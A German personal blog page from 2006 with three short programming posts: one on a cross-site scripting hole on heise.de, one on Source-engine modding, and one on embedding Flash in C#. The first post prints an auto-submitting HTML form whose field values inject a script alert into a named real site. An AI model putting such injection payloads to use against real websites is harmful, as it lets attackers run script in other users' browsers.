04
Sep
Posted by: andy / Category:
Programmieren
Habe gerade News von Heise.de angeschaut und hier gesehen, dass man bei der Bundesregierung
lustige Abfragen per Cross Site Scripting ausfuehren kann 
Nun hab ich auf dem Blog von morph3us.org gelesen, dass Heise selbst eine solche Luecke
auf ihrer Seite hat und trotz seines Emails an den Webmaster die Luecke immernoch funktioniert 
(das war im Januar 06)
Hab ich natuerlich gleich ausprobiert und siehe da, es geht immernoch..
< form method="post" action="http://www.heise.de/registration/" name="heise" >
< input type="text" name="uid" size="20" value='' >
< input type="text" name="vorname" size="20"
value='">< script >alert(”andyrockt.com is watching you!”)< /script>‘ >
< input type="text" name="name" size="20"
value='">< script >alert(”andyrockt.com is watching you!”)< script>‘ >
< /form >
< body onload= "heise.submit();" >
Mit diesem simplen HTML-Code kann man CSS-Luecken bei Heise ausprobieren
Update 05.09.2006
Hab gerade gesehen, das sogar ein noch groeberes Loch vom Blogger auf Morph3us gefunden wurde.. *smile*
Hier mehr => http://morph3us.org/blog/?p=41
Test gefaellig? => http://www.andyrockt.com/sources/
Das Ergebniss seht ihr hier falls der Link nicht mehr funktionieren sollte :
24
Aug
Posted by: andy / Category:
Programmieren
So nun habe ich das erste mal etwas Source-Coding betrieben und ich muss sagen es rockt noch
Hier ein kleiner Preview meiner ersten Gehversuche 
Fertig programmierte Maps oder Mods sind vorlaeufig (noch in Arbeit!) unter http://source.andyrockt.com verfuegbar
14
Aug
Posted by: andy / Category:
Programmieren
Ich bin jedesmal erfreut, wenn ich sehe wie manche Dinge einfach funktionieren. So nun auch das Einbinden von Flashfilmen in C#.
Man muss im Register “COM-Steuerlemente” unter Extras -> Toolboxelemente hinzufuegen/entfernen nur ein Haeckchen bei “Shockwave Flash Object” setzen.
Dann nur noch mit
String swfPath = Directory.GetCurrentDirectory() +
Path.DirectorySeparatorChar + “Dateiname.swf”;
axShockwaveFlash1.LoadMovie(0, swfPath);
den Film laden und schon kann der Spass losgehen. Mehr ist es auch nicht.
Man darf nur den Namsespace System.IO nicht vergessen.
Bin total inspiriert durch diese Moeglichkeit und muss baldmoeglichst mir einmal ein kleines
Programm im “Wuschel-Studio” (thx to Jynx)
mit Flash zusammenbasteln.
Cool ist es vorallem weil auch Flashbefehle an die Form weitergegeben werden koennen!
Einen ausfuehrlichen Artikel gibts beim Adobe-Guru Mike Chambers
